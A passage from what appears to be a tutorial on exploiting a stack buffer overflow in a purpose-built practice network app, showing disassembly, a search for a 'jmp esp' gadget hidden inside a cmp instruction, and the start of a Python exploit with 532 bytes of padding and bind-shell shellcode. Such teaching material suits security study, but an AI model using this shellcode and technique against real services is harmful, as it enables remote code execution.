DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048b50: e8 1b fb ff ff call 8048670 lt;[email protected];/span/span span class="code-line"span class="x" 8048b55: 89 45 f0 mov DWORD PTR [ebp-0x10],eax/span/span span class="code-line"span class="x" 8048b58: 8b 45 f0 mov eax,DWORD PTR [ebp-0x10]/span/span span class="code-line"span class="x" 8048b5b: 83 f8 ff cmp eax,0xffffffff/span/span span class="code-line"span class="x" 8048b5e: 75 b9 jne 8048b19 lt;sendfile+0x25gt;/span/span span class="code-line"span class="x" 8048b60: 8b 45 f4 mov eax,DWORD PTR [ebp-0xc]/span/span span class="code-line"span class="x" 8048b63: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048b66: e8 e5 fa ff ff call 8048650 lt;[email protected];/span/span span class="code-line"span class="x" 8048b6b: eb 18 jmp 8048b85 lt;sendfile+0x91gt;/span/span span class="code-line"span class="x" 8048b6d: c7 04 24 dc 8d 04 08 mov DWORD PTR [esp],0x8048ddc/span/span span class="code-line"span class="x" 8048b74: e8 27 fb ff ff call 80486a0 lt;[email protected];/span/span span class="code-line"span class="x" 8048b79: c7 04 24 01 00 00 00 mov DWORD PTR [esp],0x1/span/span span class="code-line"span class="x" 8048b80: e8 3b fb ff ff call 80486c0 lt;[email protected];/span/span span class="code-line"span class="x" 8048b85: c9 leave /span/span span class="code-line"span class="x" 8048b86: c3 ret /span/span span class="code-line"/span span class="code-line"span class="mh"08048b87/span span class="p"lt;/spanspan class="nf"senderror/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048b87: 55 push ebp/span/span span class="code-line"span class="x" 8048b88: 89 e5 mov ebp,esp/span/span span class="code-line"span class="x" 8048b8a: 83 ec 28 sub esp,0x28/span/span span class="code-line"span class="x" 8048b8d: c7 44 24 14 10 00 00 mov DWORD PTR [esp+0x14],0x10/span/span span class="code-line"span class="x" 8048b94: 00 /span/span span class="code-line"span class="x" 8048b95: 8d 45 0c lea eax,[ebp+0xc]/span/span span class="code-line"span class="x" 8048b98: 89 44 24 10 mov DWORD PTR [esp+0x10],eax/span/span span class="code-line"span class="x" 8048b9c: c7 44 24 0c 00 00 00 mov DWORD PTR [esp+0xc],0x0/span/span span class="code-line"span class="x" 8048ba3: 00 /span/span span class="code-line"span class="x" 8048ba4: c7 44 24 08 10 00 00 mov DWORD PTR [esp+0x8],0x10/span/span span class="code-line"span class="x" 8048bab: 00 /span/span span class="code-line"span class="x" 8048bac: c7 44 24 04 fb 8d 04 mov DWORD PTR [esp+0x4],0x8048dfb/span/span span class="code-line"span class="x" 8048bb3: 08 /span/span span class="code-line"span class="x" 8048bb4: 8b 45 08 mov eax,DWORD PTR [ebp+0x8]/span/span span class="code-line"span class="x" 8048bb7: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048bba: e8 61 fb ff ff call 8048720 lt;[email protected];/span/span span class="code-line"span class="x" 8048bbf: 8b 45 1c mov eax,DWORD PTR [ebp+0x1c]/span/span span class="code-line"span class="x" 8048bc2: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048bc5: e8 06 fb ff ff call 80486d0 lt;[email protected];/span/span span class="code-line"span class="x" 8048bca: c7 44 24 14 10 00 00 mov DWORD PTR [esp+0x14],0x10/span/span span class="code-line"span class="x" 8048bd1: 00 /span/span span class="code-line"span class="x" 8048bd2: 8d 55 0c lea edx,[ebp+0xc]/span/span span class="code-line"span class="x" 8048bd5: 89 54 24 10 mov DWORD PTR [esp+0x10],edx/span/span span class="code-line"span class="x" 8048bd9: c7 44 24 0c 00 00 00 mov DWORD PTR [esp+0xc],0x0/span/span span class="code-line"span class="x" 8048be0: 00 /span/span span class="code-line"span class="x" 8048be1: 89 44 24 08 mov DWORD PTR [esp+0x8],eax/span/span span class="code-line"span class="x" 8048be5: 8b 45 1c mov eax,DWORD PTR [ebp+0x1c]/span/span span class="code-line"span class="x" 8048be8: 89 44 24 04 mov DWORD PTR [esp+0x4],eax/span/span span class="code-line"span class="x" 8048bec: 8b 45 08 mov eax,DWORD PTR [ebp+0x8]/span/span span class="code-line"span class="x" 8048bef: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048bf2: e8 29 fb ff ff call 8048720 lt;[email protected];/span/span span class="code-line"span class="x" 8048bf7: c9 leave /span/span span class="code-line"span class="x" 8048bf8: c3 ret /span/span span class="code-line"/span span class="code-line"span class="mh"08048bf9/span span class="p"lt;/spanspan class="nf"sendtoken/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048bf9: 55 push ebp/span/span span class="code-line"span class="x" 8048bfa: 89 e5 mov ebp,esp/span/span span class="code-line"span class="x" 8048bfc: 83 ec 38 sub esp,0x38/span/span span class="code-line"span class="x" 8048bff: c7 44 24 04 cd 8d 04 mov DWORD PTR [esp+0x4],0x8048dcd/span/span span class="code-line"span class="x" 8048c06: 08 /span/span span class="code-line"span class="x" 8048c07: c7 04 24 0c 8e 04 08 mov DWORD PTR [esp],0x8048e0c/span/span span class="code-line"span class="x" 8048c0e: e8 ed fa ff ff call 8048700 lt;[email protected];/span/span span class="code-line"span class="x" 8048c13: 89 45 f4 mov DWORD PTR [ebp-0xc],eax/span/span span class="code-line"span class="x" 8048c16: 83 7d f4 00 cmp DWORD PTR [ebp-0xc],0x0/span/span span class="code-line"span class="x" 8048c1a: 74 56 je 8048c72 lt;sendtoken+0x79gt;/span/span span class="code-line"span class="x" 8048c1c: eb 31 jmp 8048c4f lt;sendtoken+0x56gt;/span/span span class="code-line"span class="x" 8048c1e: c7 44 24 14 10 00 00 mov DWORD PTR [esp+0x14],0x10/span/span span class="code-line"span class="x" 8048c25: 00 /span/span span class="code-line"span class="x" 8048c26: 8d 45 0c lea eax,[ebp+0xc]/span/span span class="code-line"span class="x" 8048c29: 89 44 24 10 mov DWORD PTR [esp+0x10],eax/span/span span class="code-line"span class="x" 8048c2d: c7 44 24 0c 00 00 00 mov DWORD PTR [esp+0xc],0x0/span/span span class="code-line"span class="x" 8048c34: 00 /span/span span class="code-line"span class="x" 8048c35: c7 44 24 08 01 00 00 mov DWORD PTR [esp+0x8],0x1/span/span span class="code-line"span class="x" 8048c3c: 00 /span/span span class="code-line"span class="x" 8048c3d: 8d 45 f0 lea eax,[ebp-0x10]/span/span span class="code-line"span class="x" 8048c40: 89 44 24 04 mov DWORD PTR [esp+0x4],eax/span/span span class="code-line"span class="x" 8048c44: 8b 45 08 mov eax,DWORD PTR [ebp+0x8]/span/span span class="code-line"span class="x" 8048c47: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048c4a: e8 d1 fa ff ff call 8048720 lt;[email protected];/span/span span class="code-line"span class="x" 8048c4f: 8b 45 f4 mov eax,DWORD PTR [ebp-0xc]/span/span span class="code-line"span class="x" 8048c52: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048c55: e8 16 fa ff ff call 8048670 lt;[email protected];/span/span span class="code-line"span class="x" 8048c5a: 89 45 f0 mov DWORD PTR [ebp-0x10],eax/span/span span class="code-line"span class="x" 8048c5d: 8b 45 f0 mov eax,DWORD PTR [ebp-0x10]/span/span span class="code-line"span class="x" 8048c60: 83 f8 ff cmp eax,0xffffffff/span/span span class="code-line"span class="x" 8048c63: 75 b9 jne 8048c1e lt;sendtoken+0x25gt;/span/span span class="code-line"span class="x" 8048c65: 8b 45 f4 mov eax,DWORD PTR [ebp-0xc]/span/span span class="code-line"span class="x" 8048c68: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048c6b: e8 e0 f9 ff ff call 8048650 lt;[email protected];/span/span span class="code-line"span class="x" 8048c70: eb 18 jmp 8048c8a lt;sendtoken+0x91gt;/span/span span class="code-line"span class="x" 8048c72: c7 04 24 12 8e 04 08 mov DWORD PTR [esp],0x8048e12/span/span span class="code-line"span class="x" 8048c79: e8 22 fa ff ff call 80486a0 lt;[email protected];/span/span span class="code-line"span class="x" 8048c7e: c7 04 24 01 00 00 00 mov DWORD PTR [esp],0x1/span/span span class="code-line"span class="x" 8048c85: e8 36 fa ff ff call 80486c0 lt;[email protected];/span/span span class="code-line"span class="x" 8048c8a: c9 leave /span/span span class="code-line"span class="x" 8048c8b: c3 ret /span/span span class="code-line"/span span class="code-line"span class="mh"08048c8c/span span class="p"lt;/spanspan class="nf"checkpass/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048c8c: 55 push ebp/span/span span class="code-line"span class="x" 8048c8d: 89 e5 mov ebp,esp/span/span span class="code-line"span class="x" 8048c8f: 81 ec 28 02 00 00 sub esp,0x228/span/span span class="code-line"span class="x" 8048c95: 8b 45 08 mov eax,DWORD PTR [ebp+0x8]/span/span span class="code-line"span class="x" 8048c98: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048c9b: e8 30 fa ff ff call 80486d0 lt;[email protected];/span/span span class="code-line"span class="x" 8048ca0: 83 c0 01 add eax,0x1/span/span span class="code-line"span class="x" 8048ca3: 89 44 24 08 mov DWORD PTR [esp+0x8],eax/span/span span class="code-line"span class="x" 8048ca7: 8b 45 08 mov eax,DWORD PTR [ebp+0x8]/span/span span class="code-line"span class="x" 8048caa: 89 44 24 04 mov DWORD PTR [esp+0x4],eax/span/span span class="code-line"span class="x" 8048cae: 8d 85 f0 fd ff ff lea eax,[ebp-0x210]/span/span span class="code-line"span class="x" 8048cb4: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048cb7: e8 54 fa ff ff call 8048710 lt;[email protected];/span/span span class="code-line"span class="x" 8048cbc: 8d 85 f0 fd ff ff lea eax,[ebp-0x210]/span/span span class="code-line"span class="x" 8048cc2: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048cc5: e8 86 fa ff ff call 8048750 lt;[email protected];/span/span span class="code-line"span class="x" 8048cca: 89 45 f0 mov DWORD PTR [ebp-0x10],eax/span/span span class="code-line"span class="x" 8048ccd: 81 7d f0 ff e4 00 00 cmp DWORD PTR [ebp-0x10],0xe4ff/span/span span class="code-line"span class="x" 8048cd4: 75 09 jne 8048cdf lt;checkpass+0x53gt;/span/span span class="code-line"span class="x" 8048cd6: c7 45 f4 05 00 00 00 mov DWORD PTR [ebp-0xc],0x5/span/span span class="code-line"span class="x" 8048cdd: eb 19 jmp 8048cf8 lt;checkpass+0x6cgt;/span/span span class="code-line"span class="x" 8048cdf: c7 44 24 04 2c 8e 04 mov DWORD PTR [esp+0x4],0x8048e2c/span/span span class="code-line"span class="x" 8048ce6: 08 /span/span span class="code-line"span class="x" 8048ce7: 8d 85 f0 fd ff ff lea eax,[ebp-0x210]/span/span span class="code-line"span class="x" 8048ced: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048cf0: e8 2b f9 ff ff call 8048620 lt;[email protected];/span/span span class="code-line"span class="x" 8048cf5: 89 45 f4 mov DWORD PTR [ebp-0xc],eax/span/span span class="code-line"span class="x" 8048cf8: 8b 45 f4 mov eax,DWORD PTR [ebp-0xc]/span/span span class="code-line"span class="x" 8048cfb: c9 leave /span/span span class="code-line"span class="x" 8048cfc: c3 ret /span/span span class="code-line"span class="x" 8048cfd: 90 nop/span/span span class="code-line"span class="x" 8048cfe: 90 nop/span/span span class="code-line"span class="x" 8048cff: 90 nop/span/span span class="code-line"/span span class="code-line"span class="mh"08048d00/span span class="p"lt;/spanspan class="nf"__libc_csu_fini/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048d00: 55 push ebp/span/span span class="code-line"span class="x" 8048d01: 89 e5 mov ebp,esp/span/span span class="code-line"span class="x" 8048d03: 5d pop ebp/span/span span class="code-line"span class="x" 8048d04: c3 ret /span/span span class="code-line"span class="x" 8048d05: 8d 74 26 00 lea esi,[esi+eiz*1+0x0]/span/span span class="code-line"span class="x" 8048d09: 8d bc 27 00 00 00 00 lea edi,[edi+eiz*1+0x0]/span/span span class="code-line"/span span class="code-line"span class="mh"08048d10/span span class="p"lt;/spanspan class="nf"__libc_csu_init/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048d10: 55 push ebp/span/span span class="code-line"span class="x" 8048d11: 89 e5 mov ebp,esp/span/span span class="code-line"span class="x" 8048d13: 57 push edi/span/span span class="code-line"span class="x" 8048d14: 56 push esi/span/span span class="code-line"span class="x" 8048d15: 53 push ebx/span/span span class="code-line"span class="x" 8048d16: e8 4f 00 00 00 call 8048d6a lt;__i686.get_pc_thunk.bxgt;/span/span span class="code-line"span class="x" 8048d1b: 81 c3 e5 03 00 00 add ebx,0x3e5/span/span span class="code-line"span class="x" 8048d21: 83 ec 1c sub esp,0x1c/span/span span class="code-line"span class="x" 8048d24: e8 b7 f8 ff ff call 80485e0 lt;_initgt;/span/span span class="code-line"span class="x" 8048d29: 8d bb 04 ff ff ff lea edi,[ebx-0xfc]/span/span span class="code-line"span class="x" 8048d2f: 8d 83 00 ff ff ff lea eax,[ebx-0x100]/span/span span class="code-line"span class="x" 8048d35: 29 c7 sub edi,eax/span/span span class="code-line"span class="x" 8048d37: c1 ff 02 sar edi,0x2/span/span span class="code-line"span class="x" 8048d3a: 85 ff test edi,edi/span/span span class="code-line"span class="x" 8048d3c: 74 24 je 8048d62 lt;__libc_csu_init+0x52gt;/span/span span class="code-line"span class="x" 8048d3e: 31 f6 xor esi,esi/span/span span class="code-line"span class="x" 8048d40: 8b 45 10 mov eax,DWORD PTR [ebp+0x10]/span/span span class="code-line"span class="x" 8048d43: 89 44 24 08 mov DWORD PTR [esp+0x8],eax/span/span span class="code-line"span class="x" 8048d47: 8b 45 0c mov eax,DWORD PTR [ebp+0xc]/span/span span class="code-line"span class="x" 8048d4a: 89 44 24 04 mov DWORD PTR [esp+0x4],eax/span/span span class="code-line"span class="x" 8048d4e: 8b 45 08 mov eax,DWORD PTR [ebp+0x8]/span/span span class="code-line"span class="x" 8048d51: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048d54: ff 94 b3 00 ff ff ff call DWORD PTR [ebx+esi*4-0x100]/span/span span class="code-line"span class="x" 8048d5b: 83 c6 01 add esi,0x1/span/span span class="code-line"span class="x" 8048d5e: 39 fe cmp esi,edi/span/span span class="code-line"span class="x" 8048d60: 72 de jb 8048d40 lt;__libc_csu_init+0x30gt;/span/span span class="code-line"span class="x" 8048d62: 83 c4 1c add esp,0x1c/span/span span class="code-line"span class="x" 8048d65: 5b pop ebx/span/span span class="code-line"span class="x" 8048d66: 5e pop esi/span/span span class="code-line"span class="x" 8048d67: 5f pop edi/span/span span class="code-line"span class="x" 8048d68: 5d pop ebp/span/span span class="code-line"span class="x" 8048d69: c3 ret /span/span span class="code-line"/span span class="code-line"span class="mh"08048d6a/span span class="p"lt;/spanspan class="nf"__i686.get_pc_thunk.bx/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048d6a: 8b 1c 24 mov ebx,DWORD PTR [esp]/span/span span class="code-line"span class="x" 8048d6d: c3 ret /span/span span class="code-line"span class="x" 8048d6e: 90 nop/span/span span class="code-line"span class="x" 8048d6f: 90 nop/span/span span class="code-line"/span span class="code-line"Disassembly of section span class="nl".fini/spanspan class="p":/span/span span class="code-line"/span span class="code-line"span class="mh"08048d70/span span class="p"lt;/spanspan class="nf"_fini/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048d70: 55 push ebp/span/span span class="code-line"span class="x" 8048d71: 89 e5 mov ebp,esp/span/span span class="code-line"span class="x" 8048d73: 53 push ebx/span/span span class="code-line"span class="x" 8048d74: 83 ec 04 sub esp,0x4/span/span span class="code-line"span class="x" 8048d77: e8 00 00 00 00 call 8048d7c lt;_fini+0xcgt;/span/span span class="code-line"span class="x" 8048d7c: 5b pop ebx/span/span span class="code-line"span class="x" 8048d7d: 81 c3 84 03 00 00 add ebx,0x384/span/span span class="code-line"span class="x" 8048d83: 59 pop ecx/span/span span class="code-line"span class="x" 8048d84: 5b pop ebx/span/span span class="code-line"span class="x" 8048d85: c9 leave /span/span span class="code-line"span class="x" 8048d86: c3 ret/span/span span class="code-line"/code/pre/div /td/tr/table pThere aren't any codejmp esp/code's there, you can use grep to make it a little easier to go through:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/span span class="code-line"span class="normal"27/span/span span class="code-line"span class="normal"28/span/span span class="code-line"span class="normal"29/span/span span class="code-line"span class="normal"30/span/span span class="code-line"span class="normal"31/span/span span class="code-line"span class="normal"32/span/span span class="code-line"span class="normal"33/span/span span class="code-line"span class="normal"34/span/span span class="code-line"span class="normal"35/span/span span class="code-line"span class="normal"36/span/span span class="code-line"span class="normal"37/span/span span class="code-line"span class="normal"38/span/span span class="code-line"span class="normal"39/span/span span class="code-line"span class="normal"40/span/span span class="code-line"span class="normal"41/span/span span class="code-line"span class="normal"42/span/span span class="code-line"span class="normal"43/span/span span class="code-line"span class="normal"44/span/span span class="code-line"span class="normal"45/span/span span class="code-line"span class="normal"46/span/span span class="code-line"span class="normal"47/span/span span class="code-line"span class="normal"48/span/span span class="code-line"span class="normal"49/span/span span class="code-line"span class="normal"50/span/span span class="code-line"span class="normal"51/span/span span class="code-line"span class="normal"52/span/span span class="code-line"span class="normal"53/span/span span class="code-line"span class="normal"54/span/span span class="code-line"span class="normal"55/span/span span class="code-line"span class="normal"56/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~$ /spanobjdump -d ./app-net -M intel span class="p"|/span grep jmp/span span class="code-line"span class="go" 8048616: ff 25 08 91 04 08 jmp DWORD PTR ds:0x8049108/span/span span class="code-line"span class="go" 8048620: ff 25 0c 91 04 08 jmp DWORD PTR ds:0x804910c/span/span span class="code-line"span class="go" 804862b: e9 e0 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"span class="go" 8048630: ff 25 10 91 04 08 jmp DWORD PTR ds:0x8049110/span/span span class="code-line"span class="go" 804863b: e9 d0 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"span class="go" 8048640: ff 25 14 91 04 08 jmp DWORD PTR ds:0x8049114/span/span span class="code-line"span class="go" 804864b: e9 c0 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"span class="go" 8048650: ff 25 18 91 04 08 jmp DWORD PTR ds:0x8049118/span/span span class="code-line"span class="go" 804865b: e9 b0 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"span class="go" 8048660: ff 25 1c 91 04 08 jmp DWORD PTR ds:0x804911c/span/span span class="code-line"span class="go" 804866b: e9 a0 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"span class="go" 8048670: ff 25 20 91 04 08 jmp DWORD PTR ds:0x8049120/span/span span class="code-line"span class="go" 804867b: e9 90 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"span class="go" 8048680: ff 25 24 91 04 08 jmp DWORD PTR ds:0x8049124/span/span span class="code-line"span class="go" 804868b: e9 80 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"span class="go" 8048690: ff 25 28 91 04 08 jmp DWORD PTR ds:0x8049128/span/span span class="code-line"span class="go" 804869b: e9 70 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"span class="go" 80486a0: ff 25 2c 91 04 08 jmp DWORD PTR ds:0x804912c/span/span span class="code-line"span class="go" 80486ab: e9 60 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"span class="go" 80486b0: ff 25 30 91 04 08 jmp DWORD PTR ds:0x8049130/span/span span class="code-line"span class="go" 80486bb: e9 50 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"span class="go" 80486c0: ff 25 34 91 04 08 jmp DWORD PTR ds:0x8049134/span/span span class="code-line"span class="go" 80486cb: e9 40 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"span class="go" 80486d0: ff 25 38 91 04 08 jmp DWORD PTR ds:0x8049138/span/span span class="code-line"span class="go" 80486db: e9 30 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"span class="go" 80486e0: ff 25 3c 91 04 08 jmp DWORD PTR ds:0x804913c/span/span span class="code-line"span class="go" 80486eb: e9 20 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"span class="go" 80486f0: ff 25 40 91 04 08 jmp DWORD PTR ds:0x8049140/span/span span class="code-line"span class="go" 80486fb: e9 10 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"span class="go" 8048700: ff 25 44 91 04 08 jmp DWORD PTR ds:0x8049144/span/span span class="code-line"span class="go" 804870b: e9 00 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"span class="go" 8048710: ff 25 48 91 04 08 jmp DWORD PTR ds:0x8049148/span/span span class="code-line"span class="go" 804871b: e9 f0 fe ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"span class="go" 8048720: ff 25 4c 91 04 08 jmp DWORD PTR ds:0x804914c/span/span span class="code-line"span class="go" 804872b: e9 e0 fe ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"span class="go" 8048730: ff 25 50 91 04 08 jmp DWORD PTR ds:0x8049150/span/span span class="code-line"span class="go" 804873b: e9 d0 fe ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"span class="go" 8048740: ff 25 54 91 04 08 jmp DWORD PTR ds:0x8049154/span/span span class="code-line"span class="go" 804874b: e9 c0 fe ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"span class="go" 8048750: ff 25 58 91 04 08 jmp DWORD PTR ds:0x8049158/span/span span class="code-line"span class="go" 804875b: e9 b0 fe ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"span class="go" 8048760: ff 25 5c 91 04 08 jmp DWORD PTR ds:0x804915c/span/span span class="code-line"span class="go" 804876b: e9 a0 fe ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"span class="go" 8048770: ff 25 60 91 04 08 jmp DWORD PTR ds:0x8049160/span/span span class="code-line"span class="go" 804877b: e9 90 fe ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"span class="go" 8048862: e9 79 ff ff ff jmp 80487e0 lt;register_tm_clonesgt;/span/span span class="code-line"span class="go" 8048867: e9 74 ff ff ff jmp 80487e0 lt;register_tm_clonesgt;/span/span span class="code-line"span class="go" 8048a46: eb 78 jmp 8048ac0 lt;main+0x254gt;/span/span span class="code-line"span class="go" 8048a83: eb 3b jmp 8048ac0 lt;main+0x254gt;/span/span span class="code-line"span class="go" 8048aef: e9 59 fe ff ff jmp 804894d lt;main+0xe1gt;/span/span span class="code-line"span class="go" 8048b17: eb 31 jmp 8048b4a lt;sendfile+0x56gt;/span/span span class="code-line"span class="go" 8048b6b: eb 18 jmp 8048b85 lt;sendfile+0x91gt;/span/span span class="code-line"span class="go" 8048c1c: eb 31 jmp 8048c4f lt;sendtoken+0x56gt;/span/span span class="code-line"span class="go" 8048c70: eb 18 jmp 8048c8a lt;sendtoken+0x91gt;/span/span span class="code-line"span class="go" 8048cdd: eb 19 jmp 8048cf8 lt;checkpass+0x6cgt;/span/span span class="code-line"/code/pre/div /td/tr/table pHowever, we do have another option. codeobjdump/code shows the instructions as they would be run by the processor during normal operations, you don't necessarily have to use them this way, you can instead start execution in the middle of an instruction to create a new instruction./p pThis is what we are going to try to do (this was the reason for the extra check in the application too, as you will see)./p pFirst we need to figure out what a href="https://en.wikipedia.org/wiki/Opcode" target="_blank"opcodes/a codejmp esp/code results in, we start by creating a simple assembly application with just codejmp esp/code in it:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="k"global /spanspan class="nv"_start/span/span span class="code-line"/span span class="code-line"span class="nl"_start:/span/span span class="code-line" span class="nf"jmp/span span class="nb"esp/span/span span class="code-line"/code/pre/div /td/tr/table pNow we need to assemble and link it; and then disassemble it with codeobjdump/code:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~$ /spannasm -f elf32 -o jesp.o jesp.nasm /span span class="code-line"span class="gp"[email protected]:~$ /spanld -o jesp jesp.o/span span class="code-line"span class="gp"[email protected]:~$ /spanobjdump -d ./jesp -M intel/span span class="code-line"/span span class="code-line"span class="go"./jesp: file format elf32-i386/span/span span class="code-line"/span span class="code-line"/span span class="code-line"span class="go"Disassembly of section .text:/span/span span class="code-line"/span span class="code-line"span class="go"08048060 lt;_startgt;:/span/span span class="code-line"span class="go" 8048060: ff e4 jmp esp/span/span span class="code-line"/code/pre/div /td/tr/table pSo all we need to do is find codeff e4/code anywhere in the application code. A quick grep find us an instruction that contains this sequence:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~$ /spanobjdump -d ./app-net -M intel span class="p"|/span grep span class="s1"#39;ff e4#39;/span/span span class="code-line"span class="go" 8048ccd: 81 7d f0 ff e4 00 00 cmp DWORD PTR [ebp-0x10],0xe4ff/span/span span class="code-line"/code/pre/div /td/tr/table pThis is the compare to code58623/code on line 104 of the source code above, code58623/code is actually codee4ff/code in hex and its stored as codeff e4/code because we are using a a href="https://en.wikipedia.org/wiki/Endianness#Little-endian" target="_blank"little endian/a system./p pThe start of this instruction is at the memory address code08048ccd/code and our codejmp esp/code is 3 bytes in, so just plus 3 to code08048ccd/code and we get code08048cd0/code. This is the address we will overwrite the return address with./p h2Exploiting The App/h2 pUsing all of the information we've retrieved so far we can build our exploit:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="ch"#!/usr/bin/env python/span/span span class="code-line"/span span class="code-line"span class="kn"import/span span class="nn"socket/span/span span class="code-line"/span span class="code-line"span class="n"shellcode/span span class="o"=/span span class="s2"quot;/spanspan class="se"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x17\x31\xdb\xcd\x80\x89\xd8\xb0\x66\xb3\x01\x51\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xb0\x66\xb3\x02\x52\x66\x68\x27\x0e\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x6a\x01\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x05\x52\x52\x56\x89\xe1\xcd\x80\x89\xc3\x31\xc9\xb1\x03\xfe\xc9\xb0\x3f\xcd\x80\x75\xf8\x31\xc0\x52\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xb0\x0b\xcd\x80/spanspan class="s2"quot;/span/span span class="code-line"/span span class="code-line"span class="n"payload/span span class="o"=/span span class="s2"quot;Aquot;/span span class="o"*/span span class="mi"532/span/span span class="code-line"/span span class="code-line"span class="n"payload/span span class="o"+=/span span class="s2"quot;/spanspan class="se"\xd0\x8c\x04\x08/spanspan 